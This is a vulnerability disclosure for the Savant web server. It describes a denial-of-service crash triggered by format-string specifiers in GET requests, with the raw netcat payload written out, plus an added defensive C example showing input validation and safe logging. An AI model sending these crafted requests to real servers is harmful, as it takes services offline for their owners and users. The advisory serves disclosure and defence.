Savant Web Server - Multiple Vulnerabilities
"Savant is a full-featured open-source / freeware web server designed to be run under any 32-bit version of Microsoft Windows (including Windows 95, 98, ME, XP, NT, and 2000). Savant was designed to be easy to use, fast, and secure."
More information at http://savant.sourceforge.net
Denial of service.
[Vulnerability #1] DoS with malformed GET requests
Sending Savant Web Server a GET request that contains format string specifier characters, such as %n, %d, %s, and %x, crashes the service, and a dialog box pops up saying "invalid memory reference". Examining the Savant general log files reveals that the service crashed at the location while attempting to read. Hence closing an infinite loop with this HTTP service could not handle the request and crashed.
$ nc localhost 80
GET /index.html/%n%n%n%x%n%n%n%n%x%n%n%n%x%n%s%n%d%n%s%d%n%x%n%s%d%x%n%s%d%n%x%n%d%n%x%n%s%d%x%n%s%d%n%x%n%d%n%x%d%n%s%d%n%s%d%n%d%x%d%n%s%d%n%s%d%n%x%d%n%d%x%s%n%s%d%n%d%s%d HTTP/1.1
GET /&%n/
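The bug class described above, seen from the fixing side, as an added example that is not Savant's code: it assumes (the advisory does not confirm this) that the request-target reaches a printf-style function as the format string. The function names are hypothetical; the check rejects any '%' that is not a well-formed percent-escape, and the log line is built with a constant format.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Return 1 if every '%' in the request-target starts a well-formed
 * percent-escape ('%' followed by two hex digits, RFC 3986), else 0.
 * "%n", "%s", "%x/" and a trailing "%" all fail this check. */
int target_escapes_ok(const char *target)
{
    for (const char *p = target; *p; p++) {
        if (*p != '%')
            continue;
        if (!isxdigit((unsigned char)p[1]) || !isxdigit((unsigned char)p[2]))
            return 0;
        p += 2;                      /* skip the two hex digits */
    }
    return 1;
}

/* Hardened logging: the target is an ARGUMENT to a constant format, so
 * "%n" in it is copied as plain text. The unsafe pattern would be
 * snprintf(out, outlen, target). Returns 0 if truncated or failed. */
int format_log_line(char *out, size_t outlen, const char *target, int status)
{
    int n = snprintf(out, outlen, "GET %s -> %d", target, status);
    return n >= 0 && (size_t)n < outlen;
}

/* Validation is defence in depth ("%dd" is a legal escape and passes);
 * the constant format string above is what removes the bug. */
int handle_target(const char *target, char *logline, size_t loglen)
{
    int status = target_escapes_ok(target) ? 200 : 400;
    if (!format_log_line(logline, loglen, target, status))
        snprintf(logline, loglen, "GET <target too long> -> %d", status);
    return status;
}

int main(void)
{
    /* Constructed samples; two are shortened from the advisory's requests. */
    const char *samples[] = { "/index.html", "/&%n/",
                              "/index.html/%n%n%n%x%n", "/a%20b.html" };
    char line[256];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        handle_target(samples[i], line, sizeof line);
        puts(line);
    }
    return 0;
}
```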
The same vulnerability report had also been sent to the vendor but I wasn't able to receive any acknowledgement from the vendor for a long time. So my best suggestion to Savant's users is to either disable Savant on your computer and wait for a newer release or just simply switch to another stable and secure web server.
Phuong Nguyen (ECQ)